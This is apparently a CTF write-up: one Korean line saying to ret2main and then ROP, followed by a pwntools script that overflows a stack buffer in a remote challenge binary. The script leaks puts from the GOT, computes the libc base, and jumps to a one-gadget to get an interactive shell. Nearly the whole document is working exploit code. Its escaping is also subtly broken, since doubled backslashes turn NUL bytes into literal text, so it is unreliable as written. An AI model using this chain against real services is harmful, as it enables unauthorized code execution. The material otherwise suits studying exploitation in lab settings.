Ret2main 후 ROP 수행하면 된다.

from pwn import *
import sys

# Target selection via the first CLI argument: "l" runs the local binary under
# gdb (breaking inside main), "r" connects to the remote service. Any other
# value, or a missing argument, leaves `r` unbound exactly as before.
mode = sys.argv[1]
if mode == "l":
    r = process('./challenge')
    context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(r,'''b*main+324''')
elif mode == "r":
    r = remote('44.210.9.208',10016)

# Load the challenge ELF plus the libc it resolves against; log all I/O verbosely.
e = ELF('./challenge')
libc = e.libc
context.log_level = 'debug'

def slog(name, addr):
    """Log `name: 0x...` through pwntools' success() and return its result."""
    line = ": ".join([name, hex(addr)])
    return success(line)

# Defensive note: the payloads below overwrite saved rbp and the return address
# with no canary value in between, so the binary presumably has no stack
# protector; the fixed 0x40xxxx gadget addresses likewise indicate a non-PIE
# build. Either mitigation (stack protector, PIE) or bounds-checked input
# handling would break this chain — TODO confirm with checksec.

# puts: GOT slot (holds the resolved libc pointer, readable at runtime) and
# PLT stub (callable). The GOT slot is the value leaked in stage 1.
puts_got = e.got['puts']
puts_plt = e.plt['puts']

# Resolved but unused by either payload below.
system_got = e.got['system']
system_plt = e.plt['system']

# Gadget addresses hard-coded for this exact binary build; pop_rsi_r15_ret is
# never used.
pop_rdi_ret = 0x00000000004013d3
pop_rsi_r15_ret = 0x00000000004013d1
ret =0x000000000040101a

# Bytes from the start of the input up to the saved frame pointer; the eight
# 'B's then presumably cover saved rbp — confirm against the frame at main+324.
offset = 80
# NOTE(review): backslashes appear doubled in this listing — b'\\x00' is the
# four ASCII characters \, x, 0, 0 rather than a NUL byte. This looks like page
# escaping and also affects the ljust padding and recvuntil marker below.
payload = b'Give me the flag' + b'\\x00'
# Stage 1: a lone `ret` in the return slot (presumably for 16-byte stack
# alignment before the call — TODO confirm), then puts(puts_got) to print the
# resolved puts pointer, then re-enter main so a second input is accepted.
payload += b'A' * (offset - len(payload)) + b'B' * 8 + p64(ret)
payload += p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)
payload += p64(e.symbols['main'])

r.sendlineafter(b"Welcome to the Joongbu CTF!!", payload)
r.recvuntil(b"That's not possible haha\\n")

# Leaked pointer is 6 significant bytes; pad to 8 and decode little-endian.
puts = u64(r.recv(6).ljust(8,b'\\x00'))
# libc base = leaked puts address minus puts' offset in the matching libc build.
libc_base = puts - libc.symbols['puts']
# 0xe3b01 is a hard-coded offset into the libc that e.libc resolved to; it is
# only meaningful if the remote side runs the identical build — TODO confirm.
oneshot = libc_base + 0xe3b01

# Stage 2: same overflow layout as stage 1, but the return chain is just the
# single libc address computed above.
shell_payload = b'Give me the flag' + b'\\x00'
shell_payload += b'A' * (offset - len(shell_payload)) + b'B' * 8 + p64(ret)
shell_payload += p64(oneshot)

r.sendlineafter(b"Welcome to the Joongbu CTF!!", shell_payload)

r.interactive()
